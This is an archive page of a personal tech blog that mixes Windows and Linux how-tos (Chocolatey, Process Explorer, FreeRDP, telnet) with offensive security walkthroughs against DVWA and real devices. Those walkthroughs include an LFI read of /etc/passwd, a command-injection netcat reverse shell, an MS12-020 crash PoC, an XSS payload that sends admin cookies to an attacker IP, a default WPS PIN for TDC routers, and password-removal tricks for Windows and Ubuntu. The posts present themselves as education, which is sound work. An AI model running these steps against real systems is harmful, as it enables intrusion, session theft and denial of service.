Chocolatey – Apt-get for Windows


I was at a lecture introducing some of the new features of Powershell 5. One of the top selling points was the OneGet module. OneGet is a package manager for Windows much like
Apt-get for *nix systems. It opens up a world of software deployment previously only known for *nix systems.

OneGet uses the underlying packaging infrastructure NuGet to be able to download and install software packages from different repositories. The system-level package management tool Chocolatey is a PowerShell execution engine which also uses NuGet. At the same time Chocolatey also currently holds the biggest public repository.

I often used the software Ninite when setting up a new Windows system. But Chocolatey seems more flexible, easy to script and basically more of a package manager than a software bundle. In this tutorial we will setup Chocolatey and use it to install a list of software form the Chocolatey repository. The setup process is pretty simple, and well described on the Chocolatey website.

1. Open an administrative command prompt by right clicking cmd.exe and chose run as administrator


The Command prompt opens.

2. Inset the text below and press Enter

@powershell -NoProfile -ExecutionPolicy unrestricted -Command "iex ((new-object net.webclient).DownloadString(''))" && SET PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin


Chocolatey is now being installed, there is also a possibility to do this from Powershell, please see the Chocolatey website for how to do this. When the installation is done, it’s time to find some software packages from the Chocolatey repository to install. In this tutorial I found a bunch of software packages which I find useful and would like to have installed on my system.

3. Inset the text below an press Enter

choco install notepadplusplus.install 7zip.install firefox adobereader vlc python2 putty filezilla fiddler wget curl procexp teamviewer winscp wireshark winpcap pip spotify evernote windbg vmwarevsphereclient

Chocolatey now works it’s magic and installs all the specified packages.


Once it is done Chocolatey will display a message, and the software will indeed be installed on the system.


Share Button
Posted in Scripts, Windows | Leave a comment

Process Explorer


Process Explorer is like Task Manager on drugs. I have been using it for years, and every time I decide to get to the bottom of it, I get sidetracked because it has so many uses. In this tutorial, we will have a look at some of the different task Process Explorer can be used for.

In Task Manager it is possible to show which process is running, who much memory, CPU they are consuming etc. Process Explorer does the same, but is much more specific in what kind of process or service it is, which process spawned the process, which DLL and handles it uses etc. The main interface shows a tree structure of the different process running on the system. The processes marked with red is services and the blue are “own Process” – process owned by the user you are logged in the system with.


Hovering over a process like svhost.exe reveals a tooltip showing which services this contains. Since svhost is a shared service processes it contains multiple services sharing that process. I Task manager it can be hard to identify what services in running under a svhost process, which is also why some malware sometimes disguise itself as svhost.exe.

Process Explorer also shows interrupts – which basely is the time the system spend waiting for different hardware. If a computer has a defective piece of hardware or a driver issue this can cause a so called Interrupt storm, using up the systems CPU, and you would have no way of seeing this in Task Manager.

Another feature is that you can drag and drop a bullseye icon to any windows application, and Process Explorer will identify the process running that application. An example where this would be useful would be malware removal, where process is often hidden in order to fool the user.


The Columns can be highly customized to this a range of information on the different processes, let’s add a few which I found useful.

1. Download and install Process Explorer

2. Start Process Explorer and right click the top bar and click Select Columns…

The Select Columns dialog box opens.

3. In the Process Image tab mark the tow check boxes Command Line and Autostart Location and press OK


These two options add two columns to the main interface. The first one shows the command line option to start that specific process. This could for example be useful if you wanted to script something and didn’t know which parameters a specific process should run with.


The other one shows how that process was started, this could be started from a registry key in Windows registry database, from Task Scheduler or just a link in the startup folder.


Let’s say that you would like to make some changes to a registry key which starts an application on system startup.

4. Double click the process – here skype.exe

The Skype.exe:1720 Properties dialog box opens.

5. On the Image tab under Autostart location press the explore button


The registry editor opens at the exact location so you will be able to edit the key. We want to edit the key which starts the Skype application and add a parameter so it will start minimized.

6. Double click the register key Skype

The Edit string dialog box opens.

7. Add the parameter /minimized in the in the Value data field and click OK


8. Close the registry editor

The next time Windows starts up the Skype application should start minimized instead of in a full Window.


You can also use Process Explorer to find out what process is locking up a file. If you are for example trying to delete a folder and get hit by the Folder in use alert you can identify which program is using this folder.

9. In Process Explorer press Ctrl + F

The Process Explorer search dialog box opens

10. Enter the patch of the folder you trying to delete – Here C:\test and click Search

Process Explorer will tell you which process is holding the folder, so that you can shut it down, and be able to delete it.


Another feature in process explorer is the possibility to restart or suspend a process. Sometimes if buggy software or even part of Windows itself hangs or crashes, it’s much easier to restart the process than to kill it and start it again manually.

11. Right click the process – here Explorer.exe

12. Click Restart


I don’t use the suspend option that often, but it is a nice feature which can lock application completely down. Let’s say the system gets some sort of malware which spawns new processes and shifts process to avoid detection. With the suspend feature you will be able to lock down the process and maybe figure out what it’s doing and how to remove it. I recommend this video on would process explorer can be used for malware removal.

13. Right click the process – here calc.exe

14. Click Suspend

The calculator application is now completely down and cannot be accessed in any way, or interact with your system in any way. To resume the application right click the process and click Resume.


This was a few examples of how Process Explorer can be put to use. You can dig much deeper with this tool, and it’s a must-have for advanced system debugging.

Share Button
Posted in Windows | Leave a comment

Local File Inclusion & Remote Command Execution


Local File Inclusion (LFI) is an exploit, which involves gaining access to local system files of a web server, though a website. The vulnerability occurs when a website does not have proper validating on which files it can and cannot include. From an attackers point of view the gold of LFI is often to gain vital system information or to do Remote Code Execution (RCE). The purpose of this tutorial is to show the danger of LFI and RCE and why you should always sanitized you page include when building a website.
In this scenario, we have a Kali Linux box acting as webserver on the IP address and an attacking computer running Windows 8.1 address We will be using the penetration testing application Damn Vulnerable Web Application (DVWA), which have already been installed on the Linux box.

1. Navigate to your DVWA website – here

2. Login with the username admin and password password

3. Click the File Inclusion button

Note that DVWA has three different security levels, in order to use this exploit the security need to be set to low. If we click the View Source button DWVA even shows the source code for the security levels regarding to file inclusion.

  • The Low File Inclusion Source basically allows you to get any file you want. Of course, you might be limited by the operation system, but the PHP code itself had no restriction to which files you can include.
  • Medium File Inclusion Source is the same, apart from it will not let you add anything that start with http and https.
  • Finally, the High File Inclusion Source does not allow you to include anything else the file include.php and if you try the error ERROR: File not found! will be displayed.
  • LFI2

    4. Change end of the URL from page=include.php to page=/etc/passwd


    The content of the local file passwd located in the /etc/ directory is now displayed on the screen. This file contains information on all the users on the server. Various other files could be of interest – especially log and error files because these can be manipulated by the requested URL site and POST parameter. In this scenario we will however not use LFI for gaining RCE. Instead, I encourage you to have at look at this video
    by Chris Andrè Dale.

    For RCE we be exploiting another vulnerability. Again – In order to do this, the security level needs to be set to low. The function Ping for FREE in DWVA allow us to execute the ping command though the website. However, if not properly filtered we can trick the website into executing other commands as well.

    5. Click the Command Execution button

    6. Enter; pwd and click the Submit button


    What we did was tell the site to ping the IP and ; execute the command pwd (print working directory). As you can see both commands are executed successfully and the result of pwd is shown as /var/www/vulnerabilities/exec. Now let’s try to use this vulnerability to create a remote shell from the Kali Linux server to the attacking Windows 8.1 computer. For this to work both of them needs to have Netcat installed. Further reading on using Netcat can be done in previous Netcat tutorial.

    7. From the attacking computer open a command prompt and type nc -lvp 7777

    8. In DVWA enter; nc -nv 7777 -e /bin/bash and click the Submit button

    In the command prompt, we can now see that a connection from is initiated. We now have remote shell access to the server. Note that the website also keeps loading because it is still in the process of executing the Netcat command. It will stay like that until we end the connection.

    9. Type pwd and press Enter

    10. Type whoami and press Enter


    The server responds to the commands showing which directory it currently is in, and which user we are logged in as. From here on out, I can’t say what a real attacker would do, but probably not anything nice.

    Share Button
    Posted in Linux, Networking, Security, Windows | Leave a comment

    MS12-020 RDP Vulnerability PoC & Analysis

    In March 2012 a security breach was released regarding a vulnerability in the Remote Desktop Protocol (RDP). The vulnerability related to almost all Windows platforms, and was later released under CVE-2012-0002 and MS12-020


    In short, the vulnerability enables an attacker to send a sequence of specially crafted RDP packets, which can result in remote code execution. It can however only be done if remote desktop is enabled on the system and Network Level Authentication (NLA) disabled. There is a lot of technical details on the subject – Which, to be honest, I don’t understand to the full extent of.

    The story goes that the Security researcher Luigi Auriemma found and reported this vulnerability to Zero Day Initiative (ZDI), who then reported it to Microsoft. But before Microsoft ever released a patch for the vulnerability, Chinese hackers had somehow gotten hold of Auriemmas code, and released their proof-of-concept (PoC), showing the vulnerability to the world. Luigi Auriemmas original PoC, which is as simple as sending a specially crafted packet via netcat, can be found here.

    An improved version of the Chinese PoC was later released as a Python script, which is enables an attacker to make the target machine crash with a Blue Screen of Death (BSOD). All it takes is the ability to run the script and the IP address of the target machine.

    The purpose of this tutorial it purely educational and serves to prove the importance of always keeping your systems up to date with the latest security patches. In this scenario we have an Windows 2008 R2 server running on the IP address and an attacking computer running Kali Linux on the IP address

    First of all let’s check if Windows Server is acutely vulnerable. From Microsoft we know that remote Desktop must be enabled without NLA, and the patch which fixes this vulnerability for Server 2008 R2, is called KB2621440.

    1. On the Windows server right click Computer and click Properties

    2. Click Remote Settings

    3. Check that the radio button Allow Connections from computers running any version of Remote Desktop (Less Secure) is selected.


    Now let’s check that the KB2621440 patch is not already installed.

    4. Open up a command prompt and type wmic qfe | find “KB2621440”


    No information is given which means that the patch isn’t installed on the server. So all the criterias for the vulnerability is met. Now let’s go to the attackers point of view.

    5. On the Kali Linux machine open a terminal at type wget -O

    6. Type chmod 777


    What we just did, was to download the code for the python script from pastebin, and placed it in a file called Then we made the script executable by setting the permissions for the file with chmod. All that is left now is to point the script to the IP address of the Windows server and fire away.

    7. Type python


    Game over! The script sends a few packets towards the unpatched server, and down she goes.

    Let’s try to have a closer look at what happened. This is somewhat out of my league, but I gave it a try anyway. Please feel free to correct me if I’m way off here. This is the description giving by Luigi Auriemma:

    There is an use-after-free vulnerability located in the handling of the maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of the provided proof-of-concept) when set to a value minor/equal than 5.
    The problem happens during the disconnection of the user started with RDPWD!NM_Disconnect while the effect of the possible code execution is visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid memory pointer.


    The script itself contains a small amount of python. Mostly it’s just the payload of the packets that is being sent. I’m not sure, but a wild guess would be that that “Fuck you Chelios” packet is the one which delivers the final dead punch to the server. I could use python and ndisasm to disassemble the payload of the packet like so:


    But really I’m not that good at reading machine code that I understand what this actually does. Instead, let’s have a look at the traffic in Wireshark. Filtering away all other traffic then the one from the attacking computer to the server and vice versa.


    I believe that this is the so called “Fuck you Chelios” packet, and the 0x2c offset in the maxChannelIds field, as in Luigi Auriemmas description.


    Following that, we have a bunch of T.125 packets from the server to the attacker containing the field rt-no-such-user. Finally we have an RST,ACK packet from the server which indicate that the connection had been closed. This again fits with the description saying the problem happens during the disconnection of the user.


    The information given in the BSOD, that the cause of the problem is in the termdd.sys file (which is a Remote Desktop Server Driver) is also valid. Again this matches the description which says that the problem is related to termdd!IcaBufferAlloc and termdd!IcaGetPreviousSdLink. With my knowledge this is as far as I get with this analyses.


    Finally, installing the security update KB2621440 through Windows update closes this vulnerability. Thereby, hopefully, proving my point of always keeping your system up to date.

    Share Button
    Posted in Linux, Networking, Security, Windows | Leave a comment


    In a former tutorial, I showed how to hack Windows 7 Account Password without any tools at all. In that tutorial I mentioned that there also where tools available to do this. Since I just lost the password to one of my virtual machines, I decided to make a quick tutorial on how to use such a tool. I will be using the tool Activpasswordchanger.


    This is real basic stuff, I know – but it shows you that with the right tools, getting access to an system account is child’s play unless the system disk is encrypted. To do this you need a bootable disk containing Activpasswordchanger. Furthermore you need to set your BIOS to boot form the CD-ROM drive.

    1. Boot from the CD-ROM drive and press 0 and the Enter


    We will be presented to a menu that allows us to make Activpasswordchanger automatically search for the MS SAM database, which is where Windows stores it’s users passwords.

    2. Press 2 and then Enter


    The software will scan the disk for SAM databases, this can take a little while depending of the size of the disk. Ones it has been found, select the database to clear the users password.

    3. Press Enter


    In this scenario, we only have an Administrator and a Guest account on the system. We want to clear the Administrator password so we choose this account.

    4. Press 0 and then Enter


    We are now present to a menu with a few option for this account, the option Password never expires and Clear this User’s Password is pre-selected so all we have to do is accept.

    5. Press Y an the Enter


    The password has now been removed, all we have to do now is to exit the software and reboot

    6. Press Esc, Esc, Esc to exit, remove disk and restart

    The system now starts up and logs on automatically without a password.


    Share Button
    Posted in Security, Windows | 3 Comments

    FreeRDP – RD Gateway client for Linux

    If you are Googling for software that allows you to use remote desktop from a Linux OS through a RD Gateway to another server -? Stop! I spend hours doing the same with no luck. I tried out a bunch of tools with no luck either. Here is some of the tools I tried, which does NOT support this function:

    ? Remotedesktop Client
    ? Remote Desktop Viewer
    ? Remmina Remote Desktop Client
    ? 2X Client / Remote Desktop
    ? KRDC
    ? Jump Desktop
    ? Running MS mstsc through Wine

    I have previously used iTap Mobile to set up connections through a Remote Gateway (also known as RD Gateway or TS Gateway) from a Mac. I read this could also be used for Linux OS?s. But when I went to their site, it turns out that iTap mobile has been discontinued because Microsoft released a new Microsoft Remote Desktop app. This Desktop App works for Windows, Mac and Android, but Linux is not mentioned anywhere. So I wrote the iTap team asking them for advice:

    Hi iTap team

    I’m looking for software which can connect me through an RD Gateway
    (or TS gateway) to a terminal server. I can see you are referring to the new “Microsoft Remote Desktop app”
    for Macs and Android.

    But what about Linux users like myself, is there an alternative to iTap now that you guys discontinued iTap?

    This was their reply:


    Thank you very much for your interest in iTap mobile RDP.
    Unfortunately, not that I know of. As far as I know iTap mobile RDP was the only RDP client for Linux that offered RD Gateway support.

    We are very sorry for the inconvenience.
    Best regards,

    So what did I do ? turned to the wonderful world of opensource software. FreeRDP is an awesome project started by Awake Coding aka Marc-André Moreau. It is still in development so bugs and missing documentation is to be expected. This tutorial will show you how to compile and use FreeRDP to connect to through a RD Gateway to a terminal server from Ubuntu 13.10 32 bit.

    First thing is to install Git, if you already have this installed you can skip this step.

    1. Open a terminal an type sudo apt-get install git

    Ones we have Git installed, let?s get the source files from GitHub

    2. Type git clone git://


    3. Type cd FreeRDP

    We also need a bunch of dependencies for compiling and running FreeRDP

    4. Type the following and press Enter

    sudo apt-get install build-essential git-core cmake libssl-dev libx11-dev libxext-dev libxinerama-dev \
    libxcursor-dev libxdamage-dev libxv-dev libxkbfile-dev libasound2-dev libcups2-dev libxml2 libxml2-dev \
    libxrandr-dev libgstreamer0.10-dev libgstreamer-plugins-base0.10-dev


    Now that we have all we need, the makefile must be generated.

    5. Type cmake -DCMAKE_BUILD_TYPE=Debug -DWITH_SSE2=ON .


    Finally start the build

    6. Type make


    Ones the installer had been build we can start installing the software itself

    7. Type sudo make install


    It will take a while to install but hopefully will without any errors. Ones FreeRDP is installed, there is just a little tweaking needed. We need to create a config file for FreeRDP which tells it where the FreeRDP library is placed.

    8. Type sudo nano /etc/

    9. Inset the line /usr/local/lib/freerdp

    10. Save and exit the file


    We need to check that the line we inserted is read correctly by the system. For this we start the ldconfig function, and check the path with the which command.

    11. Type sudo ldconfig

    12. Type which xfreerdp


    13. Start FreeRDP by typing xfreerdp

    FreeRDP should now be installed correctly. If you have any problems doing this, please check the wiki a GitHub.

    Let?s try using FreeRDP to connet to a terminal server though a RD Gateway server. The syntax is like this:


    But since I?m using then same account to identify myself to the RD Gateway, and the terminal server I only need to give one username and password.


    15. When asked if you trust the certificate press y


    So I get error that the Gateway certificate has changed. Someone has suggested that it is a bug in FreeRDP, because it has to handle both the RD gateways certificate and the terminal servers certificate. Anyway it is an easy fix since we can just use the /cert-ignore option.

    16. Type xfreerdp /cert-ignore /v:WORKSTATION /d:DOMAIN /u:USERNAME /p:PASSWORD /g:GATEWAY


    Success ? we have connected though the RD gateway to a Terminal server in a protected environment. Remember though that FreeRDP is still in development, so it might be buggy. If anybody knows other software or an easier way to connect to a Terminal Server though an RD Gateway please let me know.

    Share Button
    Posted in Linux, Networking | 40 Comments

    Banner Grabbing and Emailing via Telnet


    Telnet is a old network protocol which has been around longer then the internet. It was created for the purpose of remote access for network resources. It sends its data in plain text and is therefore highly insecure. Nowadays it has largely been replaced by the encrypted Secure Shell (SSH). Telnet can however be a useful tool for debugging purposes.

    Other protocols which were developed in the early days of the Internet is also quite insecure, because their details is send in plain text as well. Known protocols such as HTTP, FTP, SMTP all does this. This does also mean that there is nothing stopping you from using Telnet to communicate via these protocols. It might be impractical – but in a debugging situation, it is nice to be able to fire up telnet and, for instance, check if you mail server is responding correctly.

    This tutorial will show how to do Banner Grabbing and how use telnet to send an email via the SNMP Protocol. Since the default telnet client in Windows has been disabled since Windows Vista, the first thing you got do is enable it.

    Banner Grabbing with telnet

    Telnet can be uses to get information about a server. By sending a request via telnet to an open port on the server, it will give back relevant information about itself. This information can be OS, services and application versions. From an intruder’s point of view, this information can be used to find systems running OS or services with known exploits. this is also known as Banner Grabbing

    Note that when using Windows Telnet client there is no cursor caret, so you will not be able to see what you are typing. Furthermore, you needed to execute your command by hitting the Enter key twice. This tutorial can also be done with software such as Putty, which is a little easier to navigate.

    1. Open a command prompt and type the following commands one by one followed by pressing Enter

    telnet 80
    HEAD / HTTP/1.0


    What we did was telnet to the server, which hosts on port 80. Then send a HEAD request to get a HTTP header from the server. Here we can see it is running Apache 2.2.16 on a Debian OS. For the fun of it, let’s try requesting the site itself.

    2. Type the following commands one by one followed by pressing Enter

    telnet 80
    GET / HTTP/1.1


    Again we telnet to the server hosting on port 80. But this time we use the GET command, also we define that it’s the host we are requesting. I spared you for a bunch of HTML, but it is there.

    Sending mails via telnet

    First we need to find the name of the mail server. This can be done with the tool nslookup.

    1. Open a command prompt and type the following commands one by one followed by pressing Enter

    set type=mx


    Here we defined that we would like to see the MX records for the domain This means the mail servers used for the domain. They are defined by priority where the lowest number means the highest priority. For this tutorial, we will use the mail server address

    2. Type the following commands one by one followed by pressing Enter

    Telnet 25
    mail from:
    rcpt to:
    subject: testmail
    This is just a test


    What we just did was to telnet to one of googles mailservers on port 25, which is the port SMTP uses. We greed the server helo, and it responds at your service. Then we tell the server what mail address the mail is coming from and which address to send it too. The server responds OK. Then we tell the server we would like to input data – it responds Go ahead. We enter the text for the mail and finally sends the mail with a . Let’s check our mailbox and see if we received the mail.


    Credit goes here and here.

    Share Button
    Posted in Networking, Windows | Leave a comment

    Defacing and Cookie Stealing with Cross-site scripting

    In a cross-site scripting attack (XSS), the attacker inject scripts into input forms, search fields or site URLs, in order to make a website do different tasks when viewed by users. The object of this tutorial is to show the dangers of XSS attacks, why you should never trust user input and always sanitize your input forms, when building a web page.


    For this tutorial I will be using Damn Vulnerable Web Application (DWVA), which is a webpage designed to do penetration testing in your own environment, in a safe and legal way. This tutorial will not include the steps needed to set up DWVA*

    1. Navigate to your DWVA website – here http://localhost/DVWA-1.0.8/login.php

    2. Login with the username admin and password password

    3. Click the DVWA Security button

    4. Select low in the drop down list and press the Submit button


    The XSS test

    DVWA is now set up to not sanitize any input to forms, which means that absolutely anything you enter will be approved and placed on the webpage.

    1. Click the XSS stored button

    Here we have a simple guestbook where visitors can enter a message, which will be displayed for everyone to see. The idea is of cause, for the user to input some text, which the next users can read. The message can however, contain small scripts telling the next users webbrowser to execute certain commands. The first attack is to test if the site actually is vulnerable to XSS. We will do this with a small javascript which calls the alert function to open up a alert message in the users webbrowser.

    2. Click in the field Name and type test

    3. Click in the field Message and type:

    4. Click the Sign Guestbook button


    The signed guestbook now appears not to contain any text in the message field. That is because the webbrowser reads script is a part of the websites internal code, and not as a user message to be showed in plain text.

    5. Click the XSS stored button again to reload the site


    A popup called The page localhost says: opens. The content of the popup is 1. This is the result of your webbrowser reading the javascript we wrote earlier. This is quite harmless, but it proves that that the site is vulnerable. DVWA has a nice feature to easily clean the database and thereby also the messages from then guestbook. We are going do this before trying anything else.

    6. Click the Setup button

    7. Click the Create / Reset Database button


    Defacing with XSS

    Okay so you might be thinking All right – you can make a popup, big deal! Let’s try using XSS to “deface” the guestbook, by redirecting the users to another site. Again we will use javascript to call a function, this time to open up another website.

    1. Click the XSS stored button

    2. Click in the field Name and type Deface

    3. Click in the field Message and type:


    4. Click the Sign Guestbook button


    Again nothing is showed in the text field because the webbrowser do not think that that script is part of a plaintext comment.

    5. Click the XSS stored button again to reload the site


    You will be redirected to the site Every time the users visit the guestbook their webbrowser will redirect them to instead of showing the content of the guestbook. Let’s reset the database again, before the next attack.

    6. Go back to http://localhost/DVWA-1.0.8/setup.php and press the Create / Reset Database button

    Cookie stealing with XSS

    Let’s turn it up a notch – in this scenario we have an attacker who is on another computer and has access to our DVWA site, but not as admin. His objective is to set up a XSS attack to steal the admin session cookie, send it to him, and use it to gain access to the admin account.

    In this scenario the server running our DVWA site is a Windows computer with the IP address of The attackers computer is running Backtrack, which has the IP address of

    1. On the Backtrack computer – navigate to the DWVA website at

    2. Login with the username 1337 and password charley

    3. Click the XSS stored button

    4. Click in the field Name and type Cookie

    5. Click in the field Message and type:

    [java]<script>new Image().src=""+document.cookie;</script>[/java]

    6. Click the Sign Guestbook button


    What this javascript does, is to try to load an image from the backtrack computer. Along with the request for the image it sends the session cookie from the user who views the guestbook comment to the attackers computer. The site cookie.php does not exist on our backtrack computer, in the real world an attacker would probably set up a php site to receive sessions sent and save them to a file. But in this scenario we will just capture the raw traffic sent to the computer. We can do this by setting up a netcat listener to Listen Verbosly on Port 80 on the Backtrack computer.

    7. Open a terminal window and type nc -lvp 80

    We are now all set for the attack. The attacker can only wait for the admin to visit the guestbook. Let’s play the role of the unknowing admin for a moment.

    8. From the Windows computer visit the site http://localhost/DVWA-1.0.8/login.php

    9. Login with the username admin and password password

    10. Click the XSS stored button


    The unknowing admin will just be shown an empty message with the title Cookie. But behind the scenes a packet containing the session cookie is sent to the attackers computer. Here is what it looks like in Wireshark.


    Right – Let’s put on out back hat and play the role of the attacker again. In the Terminal window we will see that a session has been received. We now want to use this session to gain access to the admin account on the DWVA site. This can be done in a variety of ways – here we are going to use a Firefox plugin called Cookies Manager+.


    11. On the Backtrack computer open Firefox and install Cookies Manager+

    12. Navigate to the DWVA website at

    13. Press Tools | Cookie Manager+

    The Cookie Manager + tool opens. We now want to replace the session cookie of the user 1337 with the session of the user admin.

    14. Double click the session for the host named PHPSSID

    15. In the Edit cookie window, replace the value in the field Content with the session id captured in the terminal


    16. Press the Save button to close the Edit Cookie window

    17. Press the Close button to close the Cookie manager+ tool

    18. Press F5 to refresh the page


    Voila – the attacker has now gained access to the admin account, without ever knowing the password. There is much more to XSS then this, but I think this demonstrates just how dangerous XSS attacks can be. Hopefully web site developers as well as browser developers, will be aware of this danger, so that users can browse sites without being betrayed by their own webbrowsers.


    Whether or not users are hit by XSS attacks is very dependent of the webbrowser used. Some browsers block certain types of XSS attacks which others don’t and visa versa. Using a plugin like noscript in your browser helps since no client-side scripts are will be run without your permission.

    *A few pointers for setting up DWVA:
    Edit this file to allow access to the site from other client on you network:
    Edit this file to change the maximum characters in the input field:

    Credits for the use of DWVA and Cookie stealing goes here and here.

    Share Button
    Posted in Linux, Networking, Security, Windows | Leave a comment

    Hack TDC HomeBox in seconds


    In one of my previous posts I explained a little bit about the flaw in the WPS system and how to exploit it. To summarize the flaw in the WPS enabled you to bruteforce the eight-digit pin code, and thereby get access to a otherwise secured wireless network. In the meantime then flaw is still there, many manufactures of routers has “fixed” this by limiting the number of WPS attempts to their device before locking up for a certain amount of time. The same is true with TDC HomeBox.

    TDC HomeBox is preconfigured for the typical user with a predefined SSID of HomeBox-xxxx. Where xxxx represent the last four digits of the MAC address. When logging on the first time the users are instructed to use the WPS PIN from a sticker on their router. After that, they are good to go. Do you think that the average user logon to the router and disables WPS afterwards? In other words – There are a hell of a lot preconfigured routers out there, which never gets reconfigured after the initial setup! And here is the fun part – All TDC Homeboxs I have come across seems to accept the WPS PIN 12345670 – the first PIN that the WPS bruteforce application Reaver tries!


    Of course, I tried contacting TDC regarding this problem. I got in touch with a friendly administrator at TDC Forum who asked me to mail him some details and he would forward them to the proper authorities, from there they would contact me directly. I wrote a long mail, explaining the problem and sent him the same day. A week passed with no response. I wrote the guy asking if he had gotten the mail, and still nothing. It has been a month since I sent the mail – I guess that means TDC thinks it is not relevant information?

    Of cause, I could be wrong and not all TDC HomeBoxes are effected, but I am still to find one that is not. Here are pictures of four total different boxes, which all seems to accept the WPS PIN 12345670 and thereby all hacked within seconds.


    TDC is one of the biggest ISPs in Denmark. Have a look at wireless networks in your area – chances are you have one or more HomeBox-xxxx networks in your area. I my opinion you might as well put up a big sign saying FREE WIFI. If you own one of this boxes youself, please log in and disable WPS.

    Share Button
    Posted in Networking, Security | Leave a comment

    Hack Ubuntu Account Password

    In the tutorial Hack Windows 7 Account Password, I showed that having a account password on a Windows computer does not mean that it is unbreakable. In this tutorial, we are going to have a look at how to do something similar on the Linux based system – Ubuntu, by hacking the GNU GRUB loader.


    We have a system running Ubuntu 12.10, which we cannot log in to because we do not have the correct password. The object is to remove the password and gain access.

    1. At boot press Shift to bring up the GRUB loader

    2. Mark the boot option you want to use – here Ubuntu and press e


    3. Navigate down to the text linux /boot/vmlinuz-3.5

    We are now going to trick the GNU GRUB loader to drop the normal boot process and instead boot straight into a shell with root privileges.


    4. Change the argument ro to rw

    5. Remove the text splash $vt_handoff

    6. Add the text init=/bin/sh


    Changing ro (read only) to rw (read write) allow the root account to change system files doing boot instead of just reading the files. We don’t need the line splash $vt_handoff since it has to do with the graphics showed doing a boot. Finally we add the line init=/bin/sh to tell the kernel to execute a shell instead of the standard init.

    7. Press F10 to reboot

    We have rebooted in to a shell, let’s check who we are logged in as.

    8. Type whoami

    Nice, we are logged in as root – Unlimited power is at our fingertips! Now we want to remove the password for the account hegelund. This can be done in a number of ways, in this tutorial we going to do it by editing the password hash directly from the shadow file.

    9. Type nano /etc/shadow


    10. Navigate to the desired username – here hegelund


    11. Remove the hash value of the password ($hashtype$salt$password$)

    12. Press Ctrl + X to exit

    13. Press Y to save the changes and confirm by pressing Enter


    14. Reboot the computer

    15. Chose boot option you want to use – here Ubuntu and press Enter

    The changes made to the GNU GRUB loader is not permanent, so after the reboot the system should boot up as normal.

    16. Log in as the user hegelund without a password


    The method should work on all Debian based systems using the GNU GRUB loader. This tutorial serves to prove that if you store sensitive information on you system, you should not rely on an account password alone. Credit for the method goes here.

    Share Button
    Posted in Linux, Security | 1 Comment